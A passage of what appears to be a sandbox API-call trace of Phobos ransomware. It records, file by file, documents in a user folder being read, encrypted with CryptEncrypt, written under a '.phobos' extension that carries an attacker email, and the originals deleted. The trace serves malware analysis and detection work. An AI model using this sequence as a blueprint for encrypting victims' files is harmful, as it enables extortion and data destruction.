out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0196.149] CryptDestroyKey (hKey=0xa32be8) returned 1 [0196.149] CloseHandle (hObject=0xac) returned 1 [0196.149] CloseHandle (hObject=0xb8) returned 1 [0196.149] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\8h3ImrKNTgE0g\\XsP7HX.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\8h3imrkntge0g\\xsp7hx.doc")) returned 1 [0196.151] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0196.151] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\8h3ImrKNTgE0g\\_Niwl24vFC ZEfC.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\8h3imrkntge0g\\_niwl24vfc zefc.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0196.151] GetFileSizeEx (in: hFile=0xb8, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=88629) returned 1 [0196.151] CloseHandle (hObject=0xb8) returned 1 [0196.151] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\8h3ImrKNTgE0g\\_Niwl24vFC ZEfC.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\8h3imrkntge0g\\_niwl24vfc zefc.pptx")) returned 0x20 [0196.151] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\8h3ImrKNTgE0g\\_Niwl24vFC ZEfC.pptx.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\8h3imrkntge0g\\_niwl24vfc zefc.pptx.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.151] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\8h3ImrKNTgE0g\\_Niwl24vFC ZEfC.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\8h3imrkntge0g\\_niwl24vfc zefc.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0196.151] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0196.151] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0196.151] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\8h3ImrKNTgE0g\\_Niwl24vFC ZEfC.pptx.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\8h3imrkntge0g\\_niwl24vfc zefc.pptx.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0196.152] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32be8) returned 1 [0196.152] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0196.152] ReadFile (in: hFile=0xb8, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x15a35, lpOverlapped=0x0) returned 1 [0196.154] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x15a40, dwBufLen=0x15a40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x15a40) returned 1 [0196.155] WriteFile (in: hFile=0xac, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x15a40, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x15a40, lpOverlapped=0x0) returned 1 [0196.157] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32c68) returned 1 [0196.157] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0196.157] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0196.157] CryptDestroyKey (hKey=0xa32c68) returned 1 [0196.157] WriteFile (in: hFile=0xac, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0196.157] CryptDestroyKey (hKey=0xa32be8) returned 1 [0196.157] CloseHandle (hObject=0xb8) returned 1 [0196.157] CloseHandle (hObject=0xac) returned 1 [0196.157] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\8h3ImrKNTgE0g\\_Niwl24vFC ZEfC.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\8h3imrkntge0g\\_niwl24vfc zefc.pptx")) returned 1 [0196.158] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0196.158] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\fZxai2mLP\\2oU_3.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\fzxai2mlp\\2ou_3.doc"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0196.325] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=92272) returned 1 [0196.325] CloseHandle (hObject=0x15c) returned 1 [0196.325] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\fZxai2mLP\\2oU_3.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\fzxai2mlp\\2ou_3.doc")) returned 0x20 [0196.325] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\fZxai2mLP\\2oU_3.doc.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\fzxai2mlp\\2ou_3.doc.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.325] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\fZxai2mLP\\2oU_3.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\fzxai2mlp\\2ou_3.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0196.326] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0196.326] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0196.326] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\fZxai2mLP\\2oU_3.doc.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\fzxai2mlp\\2ou_3.doc.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0196.326] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ce8) returned 1 [0196.326] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0196.326] ReadFile (in: hFile=0x15c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x16870, lpOverlapped=0x0) returned 1 [0196.330] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x16880, dwBufLen=0x16880 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x16880) returned 1 [0196.330] WriteFile (in: hFile=0xb0, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x16880, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x16880, lpOverlapped=0x0) returned 1 [0196.332] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32968) returned 1 [0196.332] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0196.332] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0196.332] CryptDestroyKey (hKey=0xa32968) returned 1 [0196.332] WriteFile (in: hFile=0xb0, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0196.332] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0196.332] CloseHandle (hObject=0x15c) returned 1 [0196.332] CloseHandle (hObject=0xb0) returned 1 [0196.333] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\fZxai2mLP\\2oU_3.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\fzxai2mlp\\2ou_3.doc")) returned 1 [0196.334] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0196.334] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\fZxai2mLP\\wSEjhu9leF-\\u01pCZoo__EQA46.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\fzxai2mlp\\wsejhu9lef-\\u01pczoo__eqa46.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0196.338] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=79046) returned 1 [0196.338] CloseHandle (hObject=0xb0) returned 1 [0196.338] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\fZxai2mLP\\wSEjhu9leF-\\u01pCZoo__EQA46.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\fzxai2mlp\\wsejhu9lef-\\u01pczoo__eqa46.rtf")) returned 0x20 [0196.338] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\fZxai2mLP\\wSEjhu9leF-\\u01pCZoo__EQA46.rtf.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\fzxai2mlp\\wsejhu9lef-\\u01pczoo__eqa46.rtf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.338] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\fZxai2mLP\\wSEjhu9leF-\\u01pCZoo__EQA46.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\fzxai2mlp\\wsejhu9lef-\\u01pczoo__eqa46.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0196.338] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0196.338] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0196.338] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\fZxai2mLP\\wSEjhu9leF-\\u01pCZoo__EQA46.rtf.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\fzxai2mlp\\wsejhu9lef-\\u01pczoo__eqa46.rtf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0196.339] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ce8) returned 1 [0196.339] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0196.339] ReadFile (in: hFile=0xb0, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x134c6, lpOverlapped=0x0) returned 1 [0196.340] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x134d0, dwBufLen=0x134d0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x134d0) returned 1 [0196.341] WriteFile (in: hFile=0x15c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x134d0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x134d0, lpOverlapped=0x0) returned 1 [0196.343] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32968) returned 1 [0196.343] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0196.343] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0196.343] CryptDestroyKey (hKey=0xa32968) returned 1 [0196.343] WriteFile (in: hFile=0x15c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0196.343] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0196.343] CloseHandle (hObject=0xb0) returned 1 [0196.343] CloseHandle (hObject=0x15c) returned 1 [0196.343] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\fZxai2mLP\\wSEjhu9leF-\\u01pCZoo__EQA46.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\fzxai2mlp\\wsejhu9lef-\\u01pczoo__eqa46.rtf")) returned 1 [0196.344] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0196.344] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\fZxai2mLP\\wSEjhu9leF-\\XsbvW.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\fzxai2mlp\\wsejhu9lef-\\xsbvw.ppt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0196.345] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=19362) returned 1 [0196.345] CloseHandle (hObject=0x15c) returned 1 [0196.345] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\fZxai2mLP\\wSEjhu9leF-\\XsbvW.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\fzxai2mlp\\wsejhu9lef-\\xsbvw.ppt")) returned 0x20 [0196.345] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\fZxai2mLP\\wSEjhu9leF-\\XsbvW.ppt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\fzxai2mlp\\wsejhu9lef-\\xsbvw.ppt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.345] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\fZxai2mLP\\wSEjhu9leF-\\XsbvW.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\fzxai2mlp\\wsejhu9lef-\\xsbvw.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0196.345] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0196.345] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0196.345] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\fZxai2mLP\\wSEjhu9leF-\\XsbvW.ppt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\fzxai2mlp\\wsejhu9lef-\\xsbvw.ppt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0196.346] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ce8) returned 1 [0196.346] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0196.346] ReadFile (in: hFile=0x15c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x4ba2, lpOverlapped=0x0) returned 1 [0196.347] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x4bb0, dwBufLen=0x4bb0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x4bb0) returned 1 [0196.348] WriteFile (in: hFile=0xb0, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x4bb0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x4bb0, lpOverlapped=0x0) returned 1 [0196.349] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32968) returned 1 [0196.349] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0196.349] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0196.349] CryptDestroyKey (hKey=0xa32968) returned 1 [0196.349] WriteFile (in: hFile=0xb0, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0196.349] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0196.349] CloseHandle (hObject=0x15c) returned 1 [0196.349] CloseHandle (hObject=0xb0) returned 1 [0196.349] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\fZxai2mLP\\wSEjhu9leF-\\XsbvW.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\fzxai2mlp\\wsejhu9lef-\\xsbvw.ppt")) returned 1 [0196.357] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0196.357] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\fZxai2mLP\\ywUAB7tw1kCil NHujS7.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\fzxai2mlp\\ywuab7tw1kcil nhujs7.pps"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0196.357] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=7623) returned 1 [0196.357] CloseHandle (hObject=0xb0) returned 1 [0196.357] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\fZxai2mLP\\ywUAB7tw1kCil NHujS7.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\fzxai2mlp\\ywuab7tw1kcil nhujs7.pps")) returned 0x20 [0196.358] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\fZxai2mLP\\ywUAB7tw1kCil NHujS7.pps.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\fzxai2mlp\\ywuab7tw1kcil nhujs7.pps.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.358] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\fZxai2mLP\\ywUAB7tw1kCil NHujS7.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\fzxai2mlp\\ywuab7tw1kcil nhujs7.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0196.358] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0196.358] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0196.358] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\fZxai2mLP\\ywUAB7tw1kCil NHujS7.pps.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\fzxai2mlp\\ywuab7tw1kcil nhujs7.pps.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0196.358] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ce8) returned 1 [0196.359] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0196.359] ReadFile (in: hFile=0xb0, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x1dc7, lpOverlapped=0x0) returned 1 [0196.366] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1dd0, dwBufLen=0x1dd0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1dd0) returned 1 [0196.366] WriteFile (in: hFile=0x15c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x1dd0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x1dd0, lpOverlapped=0x0) returned 1 [0196.367] 